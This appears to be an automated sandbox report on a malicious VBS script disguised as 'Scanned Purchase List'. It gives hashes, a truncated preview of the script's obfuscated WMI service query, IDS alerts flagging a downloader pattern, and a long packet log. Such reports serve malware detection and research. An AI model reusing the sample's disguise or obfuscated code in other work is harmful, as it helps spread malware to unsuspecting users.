                Preview:p...... .........!1#....(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:modified
                Size (bytes):11608
                Entropy (8bit):4.890472898059848
                Encrypted:false
                SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Reputation:high, very likely benign file
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                File type:ASCII text, with very long lines (2199), with CRLF line terminators
                Entropy (8bit):5.944190963443498
                TrID:
                • Visual Basic Script (13500/0) 100.00%
                File name:Scanned Purchase List.vbs
                File size:22'301 bytes
                MD5:15b5b581555ff3e269c973f152f71cf6
                SHA1:b192825801c73167464fe4fdc71925b296379d24
                SHA256:24bddce898f1e7b3feb484483fe5bad7a29b95cdabef060ca7872d3ec3c2597f
                SHA512:83243ad7f5af9d43bca1816cf8a4ac9e7bb0d05111d68ffbc3d5dffb5fd0013b3a70d96f7f75bb8574182fb93df70bb82cb9afb22e763b15934525abdc9ed553
                SSDEEP:384:H4Z/mUNDZPI1/EslGZVYT0ta6yo48DNzOCjARM1bzRsCmc4yvIhk5SGll7:H4Z/JNDW1/q62yovNiCjA21brvigZ7
                TLSH:D2A24A894C9036EA156325F7898E3ABAE52D23F71A3051716D2EF4B40D083667CBC98F
                File Content Preview:..If sportshallers("C:\") <> vbnullstring then ....Set taeniobranchiate = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\r" + "oot\cimv2")....end if ......Set Supracranial = taeniobranchiate.ExecQuery("Select * from Win32_Service")....on error r
                Icon Hash:68d69b8f86ab9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-01T07:45:54.091474+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49737 | 142.250.185.142 | 443 | TCP
2024-10-01T07:46:14.480901+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49746 | 142.250.185.142 | 443 | TCP
2024-10-01T07:46:19.571212+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49747 | 142.250.185.142 | 443 | TCP
2024-10-01T07:46:24.654203+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49748 | 142.250.185.142 | 443 | TCP
2024-10-01T07:46:40.297941+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49754 | 142.250.185.142 | 443 | TCP
2024-10-01T07:47:00.922546+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49759 | 142.250.185.142 | 443 | TCP
2024-10-01T07:47:05.956043+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49760 | 142.250.185.142 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 1, 2024 07:45:39.934941053 CEST | 49731 | 443 | 192.168.2.4 | 142.250.184.238
Oct 1, 2024 07:45:39.934983015 CEST | 443 | 49731 | 142.250.184.238 | 192.168.2.4
Oct 1, 2024 07:45:39.935060024 CEST | 49731 | 443 | 192.168.2.4 | 142.250.184.238
Oct 1, 2024 07:45:39.945048094 CEST | 49731 | 443 | 192.168.2.4 | 142.250.184.238
Oct 1, 2024 07:45:39.945072889 CEST | 443 | 49731 | 142.250.184.238 | 192.168.2.4
Oct 1, 2024 07:45:40.779840946 CEST | 443 | 49731 | 142.250.184.238 | 192.168.2.4
Oct 1, 2024 07:45:40.779911995 CEST | 49731 | 443 | 192.168.2.4 | 142.250.184.238
Oct 1, 2024 07:45:40.780946970 CEST | 443 | 49731 | 142.250.184.238 | 192.168.2.4
Oct 1, 2024 07:45:40.781022072 CEST | 49731 | 443 | 192.168.2.4 | 142.250.184.238
Oct 1, 2024 07:45:40.785955906 CEST | 49731 | 443 | 192.168.2.4 | 142.250.184.238
Oct 1, 2024 07:45:40.785970926 CEST | 443 | 49731 | 142.250.184.238 | 192.168.2.4
Oct 1, 2024 07:45:40.786215067 CEST | 443 | 49731 | 142.250.184.238 | 192.168.2.4
Oct 1, 2024 07:45:40.799690008 CEST | 49731 | 443 | 192.168.2.4 | 142.250.184.238
Oct 1, 2024 07:45:40.843405008 CEST | 443 | 49731 | 142.250.184.238 | 192.168.2.4
Oct 1, 2024 07:45:41.165652037 CEST | 443 | 49731 | 142.250.184.238 | 192.168.2.4
Oct 1, 2024 07:45:41.166287899 CEST | 443 | 49731 | 142.250.184.238 | 192.168.2.4
Oct 1, 2024 07:45:41.166332960 CEST | 49731 | 443 | 192.168.2.4 | 142.250.184.238
Oct 1, 2024 07:45:41.169919968 CEST | 49731 | 443 | 192.168.2.4 | 142.250.184.238
Oct 1, 2024 07:45:41.179862976 CEST | 49732 | 443 | 192.168.2.4 | 142.250.184.193
Oct 1, 2024 07:45:41.179893017 CEST | 443 | 49732 | 142.250.184.193 | 192.168.2.4
Oct 1, 2024 07:45:41.179991961 CEST | 49732 | 443 | 192.168.2.4 | 142.250.184.193
Oct 1, 2024 07:45:41.180322886 CEST | 49732 | 443 | 192.168.2.4 | 142.250.184.193
Oct 1, 2024 07:45:41.180334091 CEST | 443 | 49732 | 142.250.184.193 | 192.168.2.4
Oct 1, 2024 07:45:41.828170061 CEST | 443 | 49732 | 142.250.184.193 | 192.168.2.4
Oct 1, 2024 07:45:41.828285933 CEST | 49732 | 443 | 192.168.2.4 | 142.250.184.193
Oct 1, 2024 07:45:41.831048012 CEST | 49732 | 443 | 192.168.2.4 | 142.250.184.193
Oct 1, 2024 07:45:41.831063032 CEST | 443 | 49732 | 142.250.184.193 | 192.168.2.4
Oct 1, 2024 07:45:41.831373930 CEST | 443 | 49732 | 142.250.184.193 | 192.168.2.4
Oct 1, 2024 07:45:41.832357883 CEST | 49732 | 443 | 192.168.2.4 | 142.250.184.193
Oct 1, 2024 07:45:41.879403114 CEST | 443 | 49732 | 142.250.184.193 | 192.168.2.4
Oct 1, 2024 07:45:42.256758928 CEST | 443 | 49732 | 142.250.184.193 | 192.168.2.4
Oct 1, 2024 07:45:42.256820917 CEST | 443 | 49732 | 142.250.184.193 | 192.168.2.4
Oct 1, 2024 07:45:42.256886005 CEST | 443 | 49732 | 142.250.184.193 | 192.168.2.4
Oct 1, 2024 07:45:42.256892920 CEST | 49732 | 443 | 192.168.2.4 | 142.250.184.193
Oct 1, 2024 07:45:42.256927967 CEST | 49732 | 443 | 192.168.2.4 | 142.250.184.193
Oct 1, 2024 07:45:42.262551069 CEST | 49732 | 443 | 192.168.2.4 | 142.250.184.193
Oct 1, 2024 07:45:46.802546024 CEST | 49733 | 443 | 192.168.2.4 | 142.250.184.238
Oct 1, 2024 07:45:46.802593946 CEST | 443 | 49733 | 142.250.184.238 | 192.168.2.4
Oct 1, 2024 07:45:46.802710056 CEST | 49733 | 443 | 192.168.2.4 | 142.250.184.238
Oct 1, 2024 07:45:46.802973986 CEST | 49733 | 443 | 192.168.2.4 | 142.250.184.238
Oct 1, 2024 07:45:46.802985907 CEST | 443 | 49733 | 142.250.184.238 | 192.168.2.4
Oct 1, 2024 07:45:47.432223082 CEST | 443 | 49733 | 142.250.184.238 | 192.168.2.4
Oct 1, 2024 07:45:47.434879065 CEST | 49733 | 443 | 192.168.2.4 | 142.250.184.238
Oct 1, 2024 07:45:47.434897900 CEST | 443 | 49733 | 142.250.184.238 | 192.168.2.4
Oct 1, 2024 07:45:47.820857048 CEST | 443 | 49733 | 142.250.184.238 | 192.168.2.4
Oct 1, 2024 07:45:47.822000980 CEST | 443 | 49733 | 142.250.184.238 | 192.168.2.4
Oct 1, 2024 07:45:47.822067022 CEST | 49733 | 443 | 192.168.2.4 | 142.250.184.238
Oct 1, 2024 07:45:47.822531939 CEST | 49733 | 443 | 192.168.2.4 | 142.250.184.238
Oct 1, 2024 07:45:47.823540926 CEST | 49734 | 443 | 192.168.2.4 | 142.250.184.193
Oct 1, 2024 07:45:47.823590994 CEST | 443 | 49734 | 142.250.184.193 | 192.168.2.4
Oct 1, 2024 07:45:47.823704958 CEST | 49734 | 443 | 192.168.2.4 | 142.250.184.193
Oct 1, 2024 07:45:47.823951960 CEST | 49734 | 443 | 192.168.2.4 | 142.250.184.193
Oct 1, 2024 07:45:47.823961020 CEST | 443 | 49734 | 142.250.184.193 | 192.168.2.4
Oct 1, 2024 07:45:48.470752001 CEST | 443 | 49734 | 142.250.184.193 | 192.168.2.4
Oct 1, 2024 07:45:48.471970081 CEST | 49734 | 443 | 192.168.2.4 | 142.250.184.193
Oct 1, 2024 07:45:48.471999884 CEST | 443 | 49734 | 142.250.184.193 | 192.168.2.4
Oct 1, 2024 07:45:48.911144972 CEST | 443 | 49734 | 142.250.184.193 | 192.168.2.4
Oct 1, 2024 07:45:48.911228895 CEST | 49734 | 443 | 192.168.2.4 | 142.250.184.193
Oct 1, 2024 07:45:48.911262035 CEST | 443 | 49734 | 142.250.184.193 | 192.168.2.4
Oct 1, 2024 07:45:48.911310911 CEST | 49734 | 443 | 192.168.2.4 | 142.250.184.193
Oct 1, 2024 07:45:48.911426067 CEST | 443 | 49734 | 142.250.184.193 | 192.168.2.4
Oct 1, 2024 07:45:48.911598921 CEST | 443 | 49734 | 142.250.184.193 | 192.168.2.4
Oct 1, 2024 07:45:48.912269115 CEST | 49734 | 443 | 192.168.2.4 | 142.250.184.193
Oct 1, 2024 07:45:48.919596910 CEST | 49734 | 443 | 192.168.2.4 | 142.250.184.193
Oct 1, 2024 07:45:52.963993073 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:45:52.964071989 CEST | 443 | 49737 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:45:52.964186907 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:45:52.964368105 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:45:52.964400053 CEST | 443 | 49737 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:45:53.593669891 CEST | 443 | 49737 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:45:53.595633984 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:45:53.595649004 CEST | 443 | 49737 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:45:54.091259956 CEST | 443 | 49737 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:45:54.091334105 CEST | 443 | 49737 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:45:54.091732979 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:45:54.091747999 CEST | 443 | 49737 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:45:54.091758013 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:45:54.091792107 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:45:54.092770100 CEST | 49740 | 443 | 192.168.2.4 | 142.250.184.193
Oct 1, 2024 07:45:54.092813969 CEST | 443 | 49740 | 142.250.184.193 | 192.168.2.4
Oct 1, 2024 07:45:54.092875957 CEST | 49740 | 443 | 192.168.2.4 | 142.250.184.193
Oct 1, 2024 07:45:54.093127966 CEST | 49740 | 443 | 192.168.2.4 | 142.250.184.193
Oct 1, 2024 07:45:54.093147039 CEST | 443 | 49740 | 142.250.184.193 | 192.168.2.4
Oct 1, 2024 07:45:54.101175070 CEST | 49740 | 443 | 192.168.2.4 | 142.250.184.193
Oct 1, 2024 07:45:54.147413015 CEST | 443 | 49740 | 142.250.184.193 | 192.168.2.4
Oct 1, 2024 07:45:54.730447054 CEST | 443 | 49740 | 142.250.184.193 | 192.168.2.4
Oct 1, 2024 07:45:54.730551004 CEST | 49740 | 443 | 192.168.2.4 | 142.250.184.193
Oct 1, 2024 07:45:58.134335995 CEST | 49743 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:45:58.134388924 CEST | 443 | 49743 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:45:58.134450912 CEST | 49743 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:45:58.134707928 CEST | 49743 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:45:58.134721041 CEST | 443 | 49743 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:45:58.776197910 CEST | 443 | 49743 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:45:58.783832073 CEST | 49743 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:45:58.783858061 CEST | 443 | 49743 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:45:59.180320978 CEST | 443 | 49743 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:45:59.182058096 CEST | 443 | 49743 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:45:59.182182074 CEST | 49743 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:45:59.182413101 CEST | 49743 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:03.188185930 CEST | 49744 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:03.188277960 CEST | 443 | 49744 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:03.188379049 CEST | 49744 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:03.188687086 CEST | 49744 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:03.188723087 CEST | 443 | 49744 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:03.837764025 CEST | 443 | 49744 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:03.839281082 CEST | 49744 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:03.839303017 CEST | 443 | 49744 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:04.232855082 CEST | 443 | 49744 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:04.233712912 CEST | 443 | 49744 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:04.233763933 CEST | 49744 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:04.234283924 CEST | 49744 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:08.235146999 CEST | 49745 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:08.235193014 CEST | 443 | 49745 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:08.235265970 CEST | 49745 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:08.235471010 CEST | 49745 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:08.235480070 CEST | 443 | 49745 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:08.865556955 CEST | 443 | 49745 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:08.866787910 CEST | 49745 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:08.866805077 CEST | 443 | 49745 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:09.249012947 CEST | 443 | 49745 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:09.250432014 CEST | 443 | 49745 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:09.250505924 CEST | 49745 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:09.250813007 CEST | 49745 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:13.250509024 CEST | 49746 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:13.250567913 CEST | 443 | 49746 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:13.250698090 CEST | 49746 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:13.250943899 CEST | 49746 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:13.250956059 CEST | 443 | 49746 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:13.884335995 CEST | 443 | 49746 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:13.885637999 CEST | 49746 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:13.885658979 CEST | 443 | 49746 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:14.480946064 CEST | 443 | 49746 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:14.481020927 CEST | 443 | 49746 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:14.481170893 CEST | 49746 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:14.481600046 CEST | 49746 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:18.523298025 CEST | 49747 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:18.523355007 CEST | 443 | 49747 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:18.523426056 CEST | 49747 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:18.523673058 CEST | 49747 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:18.523690939 CEST | 443 | 49747 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:19.169967890 CEST | 443 | 49747 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:19.171226978 CEST | 49747 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:19.171256065 CEST | 443 | 49747 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:19.571249962 CEST | 443 | 49747 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:19.572448969 CEST | 443 | 49747 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:19.572571993 CEST | 49747 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:19.572860956 CEST | 49747 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:23.594597101 CEST | 49748 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:23.594659090 CEST | 443 | 49748 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:23.594727039 CEST | 49748 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:23.595063925 CEST | 49748 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:23.595073938 CEST | 443 | 49748 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:24.254071951 CEST | 443 | 49748 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:24.255356073 CEST | 49748 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:24.255378962 CEST | 443 | 49748 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:24.654205084 CEST | 443 | 49748 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:24.654666901 CEST | 49748 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:24.654716969 CEST | 443 | 49748 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:24.654772043 CEST | 49748 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:24.655431986 CEST | 49749 | 443 | 192.168.2.4 | 142.250.184.193
Oct 1, 2024 07:46:24.655472994 CEST | 443 | 49749 | 142.250.184.193 | 192.168.2.4
Oct 1, 2024 07:46:24.655539036 CEST | 49749 | 443 | 192.168.2.4 | 142.250.184.193
Oct 1, 2024 07:46:24.655752897 CEST | 49749 | 443 | 192.168.2.4 | 142.250.184.193
Oct 1, 2024 07:46:24.655762911 CEST | 443 | 49749 | 142.250.184.193 | 192.168.2.4
Oct 1, 2024 07:46:24.663979053 CEST | 49749 | 443 | 192.168.2.4 | 142.250.184.193
Oct 1, 2024 07:46:24.711395025 CEST | 443 | 49749 | 142.250.184.193 | 192.168.2.4
Oct 1, 2024 07:46:25.283421993 CEST | 443 | 49749 | 142.250.184.193 | 192.168.2.4
Oct 1, 2024 07:46:25.283512115 CEST | 49749 | 443 | 192.168.2.4 | 142.250.184.193
Oct 1, 2024 07:46:25.283560991 CEST | 49749 | 443 | 192.168.2.4 | 142.250.184.193
Oct 1, 2024 07:46:28.672255993 CEST | 49750 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:28.672310114 CEST | 443 | 49750 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:28.672377110 CEST | 49750 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:28.672641039 CEST | 49750 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:28.672652960 CEST | 443 | 49750 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:29.298243999 CEST | 443 | 49750 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:29.298315048 CEST | 49750 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:29.298995018 CEST | 443 | 49750 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:29.299052954 CEST | 49750 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:29.302666903 CEST | 49750 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:29.302680016 CEST | 443 | 49750 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:29.302912951 CEST | 443 | 49750 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:29.303854942 CEST | 49750 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:29.347404957 CEST | 443 | 49750 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:29.721427917 CEST | 443 | 49750 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:29.721506119 CEST | 443 | 49750 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:29.721595049 CEST | 49750 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:29.722498894 CEST | 49750 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:29.723493099 CEST | 49751 | 443 | 192.168.2.4 | 142.250.184.193
Oct 1, 2024 07:46:29.723546028 CEST | 443 | 49751 | 142.250.184.193 | 192.168.2.4
Oct 1, 2024 07:46:29.723628998 CEST | 49751 | 443 | 192.168.2.4 | 142.250.184.193
Oct 1, 2024 07:46:29.793129921 CEST | 49751 | 443 | 192.168.2.4 | 142.250.184.193
Oct 1, 2024 07:46:29.793227911 CEST | 443 | 49751 | 142.250.184.193 | 192.168.2.4
Oct 1, 2024 07:46:29.793303967 CEST | 49751 | 443 | 192.168.2.4 | 142.250.184.193
Oct 1, 2024 07:46:34.000576973 CEST | 49753 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:34.000623941 CEST | 443 | 49753 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:34.000725031 CEST | 49753 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:34.000960112 CEST | 49753 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:34.000977039 CEST | 443 | 49753 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:34.750227928 CEST | 443 | 49753 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:34.751394033 CEST | 49753 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:34.751418114 CEST | 443 | 49753 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:35.161227942 CEST | 443 | 49753 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:35.161303997 CEST | 443 | 49753 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:35.161356926 CEST | 49753 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:35.161732912 CEST | 49753 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:39.172322035 CEST | 49754 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:39.172415972 CEST | 443 | 49754 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:39.172513962 CEST | 49754 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:39.172730923 CEST | 49754 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:39.172761917 CEST | 443 | 49754 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:39.819818974 CEST | 443 | 49754 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:39.821122885 CEST | 49754 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:39.821141958 CEST | 443 | 49754 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:40.297714949 CEST | 443 | 49754 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:40.297791004 CEST | 443 | 49754 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:40.297849894 CEST | 49754 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:40.298235893 CEST | 49754 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:44.297480106 CEST | 49755 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:44.297540903 CEST | 443 | 49755 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:44.297626972 CEST | 49755 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:44.297883034 CEST | 49755 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:44.297903061 CEST | 443 | 49755 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:44.955710888 CEST | 443 | 49755 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:44.957124949 CEST | 49755 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:44.957160950 CEST | 443 | 49755 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:45.360275984 CEST | 443 | 49755 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:45.360344887 CEST | 443 | 49755 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:45.360400915 CEST | 49755 | 443 | 192.168.2.4 | 142.250.185.142
